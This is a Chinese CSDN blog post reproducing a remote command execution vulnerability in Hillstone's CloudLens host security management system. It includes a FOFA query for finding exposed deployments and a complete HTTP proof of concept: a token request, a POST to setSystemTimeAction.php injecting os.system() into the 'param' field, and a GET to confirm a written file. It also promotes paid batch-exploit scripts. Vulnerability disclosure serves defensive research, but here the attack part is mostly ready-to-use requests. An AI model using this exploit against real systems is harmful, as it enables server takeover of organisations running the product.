山石网科云鉴安全管理系统 setsystemtimeaction rce漏洞

最新推荐文章于 2024-04-28 14:18:20 发布
最新推荐文章于 2024-04-28 14:18:20 发布
阅读量823 收藏 4
点赞数 25
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39894062/article/details/137796979
版权

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

山石网科云鉴主机安全管理系统,围绕主机检测、响应、预防可持续安全运营,实现主机安全全生命周期管理。通过对主机进行脆弱性检测、东西向微隔离管控、多错点风险检测、多层级安全响应等措施,解决主机资产管理、安全加固、东西向流量防护、威胁实时检测、应急响应、失陷主机定位等安全问题,能够有效帮助安全管理人员应对日趋严峻的主机风险态。

0x03 漏洞威胁

由于该软件的 Web 应用对用户的输入未进行有效过滤,直接拼接系统命令执行,造成了远程命令执行漏洞。攻击者可通过构造恶意请求,拼接命令执行任意代码,控制服务器。

影响模块:

getMessageSettingAction, /master/ajaxActions/setSystemTimeAction.php, /admin/client.php

0x04 漏洞环境

FOFA:

body="山石云鉴主机安全管理系统"

0x05 漏洞复现

POC

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: 
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

通过补丁修复

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

鲨鱼辣椒丶D
关注
  • 25
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】山石网科云鉴安全管理系统ajaxActions接口处存在RCE漏洞
weixin_52204925的博客
04-13 449
山石网科云鉴安全管理系统ajaxActions接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
山石云鉴主机安全管理系统前台任意命令执行漏洞分析
blackzer0的博客
02-29 892
山石网科云鉴存在前台任意命令执行漏洞
山石 版本升级_山石网科升级特征库防“心脏出血”漏洞
weixin_39526651的博客
12-20 542
【IT168 资讯】最新消息:今日上午网络安全领导厂商山石网科发布消息称,经过确认,山石网科目前在售的所有产品,包括M/G系列企业安全网关、X系列数据中心防火墙、T系列下一代智能防火墙、HSM网管服务器、HSA日志审计服务器、网络入侵防御系统NIPS等全系列产品均不存在OpenSSL官方公布的 1.0.1和1.0.2-beta系列版本严重信息泄露漏洞(CVE-2014-0160)。也不会因为此漏洞...
山石网科云鉴安全管理系统setsystemtimeaction rce漏洞(含批量验证poc)
最新发布
weixin_43567873的博客
04-28 182
山石网科云鉴安全管理系统setsystemtimeaction rce漏洞(含批量验证poc)
【网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 665
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 831
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
网络安全之弱口令与命令爆破(上篇)(技术进阶)
weixin_70911257的博客
04-25 1380
小小狗蛋可笑可笑
第一阶段--Day2--信息安全法律法规、网络安全相关标准
m0_58361380的博客
04-26 904
中华人民共和国计算机信息系统安全保护条例》1994年2月18日颁布并实施《中华人民共和国国际联网安全保护管理办法》1997年12月30日发布并实行《互联网信息服务管理办法》2000公布,2011年修订《网络安全法》2017年6月1日起施行《信息安全技术 网络安全等级保护基本要求》等保2.0 2019年5月13日《网络安全审查办法》2022年2月15日起施行《密码法》及相关条例规定2020年1月1日实施《数据安全法》2021年9月1日起施行。
网络安全(黑客技术)—2024自学
Android_wxf的博客
04-17 1741
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
图纸文件如何实现全加密,在透明加密的基础上实现全加密功能
专业数据安全服务提供商!
04-26 399
我们知道现在的企业图纸加密软件,普遍采用的技术是驱动层透明加密技术,这种做防泄密的原理就是事先控制的方式,就是说事先我们需要把我们认为是重要的数据需要加密的数据进行加密,加密后只能在公司内部使用。安秉信息图纸加密软件,在安装客户端的电脑上通过涉密软件产生的所有的不同类型的文件都是加密的,可以有效的防止企业图纸泄密的问题出现,从根源上保证企业图纸文档的安全。落地加密:企业在使用加密软件时,可以对指定格式的文件,只要保存到硬盘上不管是打开与否就会自动强制加密,这样就会弥补没打开的文件不加密的漏洞
网络安全之文件上传漏洞(上篇)(技术进阶)
weixin_70911257的博客
04-26 917
文件上传漏洞就是服务器端脚本没有对上传的文件进行严格的过滤和验证,导致黑客利用这个漏洞上传恶意脚本从而达到控制整个网站甚至是服务器。文件上传绕过方法不是一成不变的,我这里一关列举了一种方法,在熟练运用后会发现原来同一关可以有多个绕过方法,所以灵活运用晓其原理才能更好的玩转文件上传漏洞中篇下个星期一更!!
渗透测试基础知识之Web安全教程系列(引言)
fearhacker的专栏
04-26 529
HTTP协议传输的数据是明文的,容易在局域网环境内被抓包,HTTPS协议传输的数据是密文的,可能需要采取中间人欺骗和攻击的方式来抓取HTTPS协议传输的明文数据(例如,我们可能需要把自己伪装成网关,网关通常指的是局域网的路由器),HTTPS协议传输的数据,对于网关而言,是明文的!Web安全,重点的研究方向是:Web领域相关的通信协议、Web平台软件、Web平台软件的操作系统、Web平台软件的网络环境,Web应用程序的编码语言、Web应用程序的类型、Web应用程序的软件作者、Web应用程序的一些其它信息等。
【网络安全】对称加密、非对称加密以及密钥分配
swadian2008的博客
04-23 899
在 2001 年,NIST 曾有一个大致的估计,就是假定有一台高速计算机,仅用 1 秒钟就能够破译 56 位的 DES,那么要破译 128 位的 AES,就需要。//就比如你向你的朋友转账(通信),首先必须知道对方的账号(公钥),然后把钱转到对方的账户上(公钥加密),这样你的朋友使用密码就可以取得到你转账的钱(私钥解密)在许多应用中,人们需要对纯数字的电子信息进行签名,表明该信息确实是某个特定的人产生的。的方案,把一个 64 位明文用一个密钥加密,再用另一个密钥解密,然后再使用第一个密钥加密,即。
网络安全(黑客)—-2024自学手册
xv7676的博客
04-22 1058
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)—2024自学
dexi113的博客
04-17 3998
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
天空卫士旗舰产品入选《网络安全专用产品指南》
Scgute88的博客
04-26 818
为方便广大用户深入了解网络安全专用产品的功能特点,以便更好地选择和使用相关产品,中国网络安全产业联盟(CCIA)面向广大网络安全企业征集并整理了网络安全专用产品相关信息,编制形成《网络安全专用产品指南》(第一版)(以下简称《指南》)。增强型Web安全网关(ASWG)以深层次内容解析和持续的威胁检测技术为核心,集成数据防泄露DLP模块,有效识别并防御来自Web的各种威胁和攻击,提前感知潜在风险,为企业打造一个全方位的安全防护屏障,确保免受高级威胁和数据泄露的侵害。3、数据泄露防护产品- MAG。
白帽子讲Web安全读书笔记
Nevadas的博客
04-26 262
脚本小子(网络犯罪的主要人物):自己不会编exploit,只懂得编译别人的exploit的黑客。SSH:全称Secure Shell,即安全外壳协议,是一种。在不安全网络上提供安全远程登录及其它安全网络服务的协议。白帽子:那些精通安全技术,但是工作在反黑客领域的专家们。黑帽子:利用黑客技术造成破坏,甚至进行网络犯罪的群体。安全问题的本质是信任的问题。安全是一个持续的过程。黑客发展阶段:启蒙 -> 黄金 -> 黑暗时代。exploit:黑客们使用的漏洞利用代码。可用性( Availability )。
简单谈谈URL过滤在网络安全中的作用
dexunjiaqiang的博客
04-23 876
为了考虑公司独特的流量模式,设备上的缓存存储最近访问的 URL,并且还能够在找不到设备上的 URL 时查询云中的主数据库以获取 URL 类别信息。URL过滤是一种网络安全措施,用于限制或阻止访问特定的网站或网页。相反,需要将URL过滤合并到本地集成的下一代安全平台中,包括威胁分析和情报以阻止已知和未知威胁,以充分保护网络、端点和云服务免受通常用于绕过传统安全的策略的攻击机制。总的来说,URL过滤是一种有效的网络安全工具,可以帮助用户和组织更好地管理和控制其网络访问行为,确保网络环境的安全和合规性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值